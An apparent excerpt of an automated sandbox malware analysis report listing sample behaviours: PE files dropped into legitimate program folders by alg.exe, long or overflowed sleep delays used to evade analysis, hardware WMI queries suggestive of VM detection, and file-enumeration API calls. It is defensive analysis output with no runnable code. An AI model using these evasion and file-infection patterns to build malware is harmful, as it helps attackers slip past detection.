                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                    Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                    Source: C:\Users\Public\alpha.pifAPI coverage: 7.8 %
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2968Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5440Thread sleep count: 1668 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -99872s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -99714s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -99589s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -99449s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -99172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -98887s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -98664s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -98534s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -98299s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -97922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -97796s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -97527s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -97274s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -97150s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -96968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -96825s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -96570s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -96299s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95822s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95662s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95388s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95189s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -95047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5080Thread sleep count: 419 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94910s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94785s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94529s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94371s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94242s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -94117s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -93939s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508Thread sleep time: -93715s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6116Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 7344Thread sleep time: -720000s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 6104Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 760Thread sleep count: 4599 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4772Thread sleep time: -220000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6040Thread sleep count: 284 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2932Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6976Thread sleep time: -70000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99655s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99543s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98761s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98639s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98527s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98421s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98312s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98200s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -98093s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97984s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97656s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -97000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96751s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96625s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96513s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96375s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96249s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96134s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -96031s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95916s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95810s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95374s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95265s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95156s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -95046s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94937s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94828s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94701s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324Thread sleep time: -94374s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2228Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092Thread sleep time: -562620000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092Thread sleep time: -24600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                    Source: C:\Windows\System32\alg.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CF5908
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_00EE532E
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00EE532E
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99872Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99714Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99589Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99449Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98887Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98664Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98534Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98299Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98156Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97922Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97527Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97274Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97150Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96968Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96825Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96570Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96299Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95822Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95662Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95499Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95388Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95189Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95047Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94910Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94785Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94641Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94529Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94371Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94242Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94117Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 93939Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 93715Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99890
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99655
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99543
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98999
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98761
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98639
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98527
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98421
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98312
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98200
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98093
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97984
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97874
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97765
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97656
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97546
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97437
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97328
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97218
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97109
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96890
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96751
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96625
